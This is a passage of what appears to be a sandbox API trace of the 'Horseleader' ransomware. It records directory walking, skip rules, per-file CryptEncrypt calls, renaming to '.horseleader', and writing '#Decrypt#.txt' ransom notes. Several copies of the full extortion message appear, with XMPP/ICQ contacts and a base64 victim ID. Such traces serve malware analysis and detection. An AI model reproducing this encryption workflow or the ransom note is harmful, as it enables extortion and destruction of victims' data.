hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0251.269] CloseHandle (hObject=0x1a4) returned 1 [0251.269] GetProcessHeap () returned 0x780000 [0251.269] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0251.270] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.horseleader") returned 77 [0251.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.horseleader" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll.horseleader")) returned 1 [0251.271] GetProcessHeap () returned 0x780000 [0251.271] HeapFree 
(in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0251.271] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0xe580, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="MSMAPI32.DLL", cAlternateFileName="")) returned 0 [0251.271] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.271] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\#Decrypt#.txt") returned 66 [0251.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.272] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.272] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.273] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.273] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.273] CloseHandle (hObject=0x158) returned 1 [0251.273] 
GetProcessHeap () returned 0x780000 [0251.273] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.273] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 0 [0251.274] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0251.274] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\#Decrypt#.txt") returned 61 [0251.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.274] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.275] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.276] lstrlenA (lpString="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") returned 1368 [0251.276] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.276] CloseHandle (hObject=0x21c) returned 1 [0251.276] GetProcessHeap () returned 0x780000 [0251.276] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.276] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0251.277] lstrcmpiW (lpString1="Ole DB", lpString2="Windows") returned -1 [0251.277] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB") returned 47 [0251.277] lstrcmpW (lpString1="Ole DB", lpString2=".") returned 1 [0251.277] lstrcmpW (lpString1="Ole DB", lpString2="..") returned 1 [0251.277] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.277] GetProcessHeap () returned 0x780000 [0251.277] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
0x79b628 [0251.277] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*") returned 49 [0251.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0251.280] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.280] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.") returned 49 [0251.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.280] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0251.280] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.280] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\..") returned 50 [0251.280] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.280] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 
| out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0251.280] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0251.281] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 53 [0251.281] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0251.281] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0251.281] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.281] GetProcessHeap () returned 0x780000 [0251.281] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.281] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*") returned 55 [0251.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.281] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.282] wnsprintfW (in: pszDest=0x7dc820, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.") returned 55 [0251.282] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.282] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0251.282] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.282] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\..") returned 56 [0251.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.282] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb6d5cd, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xbeb51b3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xbb6d5cd, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msdasqlr.dll.mui", cAlternateFileName="")) returned 1 [0251.282] lstrcmpiW (lpString1="msdasqlr.dll.mui", lpString2="Windows") returned -1 [0251.282] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 70 [0251.282] StrStrIW (lpFirst="msdasqlr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.282] lstrcmpW 
(lpString1="msdasqlr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.282] lstrcmpW (lpString1="msdasqlr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.282] lstrlenW (lpString=".testttjffg") returned 11 [0251.282] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.282] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.282] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.283] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aabb7e, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8aabb7e, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xba00, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="oledb32r.dll.mui", cAlternateFileName="")) returned 1 [0251.284] lstrcmpiW (lpString1="oledb32r.dll.mui", lpString2="Windows") returned -1 [0251.284] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 70 [0251.284] StrStrIW (lpFirst="oledb32r.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.284] lstrcmpW (lpString1="oledb32r.dll.mui", 
lpString2="#Decrypt#.txt") returned 1 [0251.284] lstrcmpW (lpString1="oledb32r.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.284] lstrlenW (lpString=".testttjffg") returned 11 [0251.284] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.284] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.284] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.285] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb93886, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xbeb51b3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xbb93886, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="sqloledb.rll.mui", cAlternateFileName="")) returned 1 [0251.285] lstrcmpiW (lpString1="sqloledb.rll.mui", lpString2="Windows") returned -1 [0251.286] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 70 [0251.286] StrStrIW (lpFirst="sqloledb.rll.mui", lpSrch=".horseleader") returned 0x0 [0251.286] lstrcmpW (lpString1="sqloledb.rll.mui", lpString2="#Decrypt#.txt") returned 1 
[0251.286] lstrcmpW (lpString1="sqloledb.rll.mui", lpString2="_uninstalling_.png") returned 1 [0251.286] lstrlenW (lpString=".testttjffg") returned 11 [0251.286] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", lpSrch=".testttjffg") returned 0x0 [0251.286] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.286] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.286] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.286] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad1e37, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8ad1e37, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 1 [0251.286] lstrcmpiW (lpString1="sqlxmlx.rll.mui", lpString2="Windows") returned -1 [0251.287] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 69 [0251.287] StrStrIW (lpFirst="sqlxmlx.rll.mui", lpSrch=".horseleader") returned 0x0 [0251.287] lstrcmpW (lpString1="sqlxmlx.rll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.287] lstrcmpW 
(lpString1="sqlxmlx.rll.mui", lpString2="_uninstalling_.png") returned 1 [0251.287] lstrlenW (lpString=".testttjffg") returned 11 [0251.287] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", lpSrch=".testttjffg") returned 0x0 [0251.287] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.287] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.287] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad1e37, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x8e65f8f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x8ad1e37, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 0 [0251.287] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.288] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\#Decrypt#.txt") returned 67 [0251.288] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.291] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install 